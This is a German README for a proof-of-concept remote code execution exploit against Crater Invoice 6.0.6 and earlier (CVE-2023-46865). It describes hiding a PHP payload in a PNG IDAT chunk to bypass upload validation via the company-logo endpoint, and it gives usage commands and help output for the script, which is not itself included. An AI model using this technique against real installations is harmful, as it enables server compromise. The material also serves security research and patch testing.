
Crater <=6.0.6, CVE-2023-46865 RCE nach Authentifizierung (Superadmin)
Crater <=6.0.6, CVE-2023-46865 Post-Auth RCE (Superadmin)
Crater Invoice ist anfällig für uneingeschränkte Datei-Uploads mit gefährlichem Typ aufgrund fehlender ordnungsgemäßer Eingabevalidierung. Die Base64Mime-Prüfklasse kann umgangen werden, indem eine gültige PHP-Nutzlast in einen IDAT-Bildchunk eingebettet wird. Ein Benutzer mit Superadmin-Rechten kann die manipulierte Nutzlast über das Firmenlogo unter /api/v1/company/upload-logo hochladen.
$~ usage: python3 crater-rce.py --target TARGET --email EMAIL --password PASSWORD [--cmd CMD]
$~ python3 crater-rce.py --target http://192.168.1.1 --email [email protected] --password test1234 --cmd 'whoami'
$~ python3 crater-rce.py -h
usage: crater-rce.py [-h] --target TARGET --email EMAIL --password PASSWORD [--cmd CMD]
Crater Invoice RCE - CVE-2023-46865
options:
-h, --help show this help message and exit
--target TARGET Target URL
--email EMAIL Email
--password PASSWORD Password
--cmd CMD Command to execute
- Crater 6.0.6
- Kali 6.1.0
faisalfs10x - für die Hilfe bei der Entwicklung des Proof of Concept.
Das Skript dient ausschließlich der Sicherheitsanalyse und -forschung, daher übernehme ich keine Haftung, wenn es für illegale Aktivitäten verwendet wird.